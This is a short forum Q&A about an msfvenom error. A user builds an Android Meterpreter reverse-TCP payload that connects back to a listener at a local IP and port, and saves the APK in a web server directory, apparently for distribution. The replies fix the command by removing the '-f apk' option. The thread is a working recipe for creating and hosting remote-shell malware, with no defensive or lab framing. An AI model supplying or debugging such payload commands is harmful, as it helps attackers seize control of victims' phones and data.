# Error in msfvenom "Error: Invalid Format Selected" for android

Tags: android, malware, payload, metasploit

today after a long time I was trying to make a payload for android but I got an error there which is

> "Error: Invalid Format Selected"

this is the command:

```
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.4 lport=4444 -f apk -o /var/www/html/files.apk
```

I tried making payload for windows, but it worked successfully.
what should I do now

Comment: there is no "-f apk"  in msfvenom

Answer (score 0):

I got it if I don't use "-f apk" it works fine then. Because there is no "apk" in the msfvenom's man page

Comment: because if you type "msfvenom --help-format " you will not find "apk" format i.e why it says "Invalid format selected"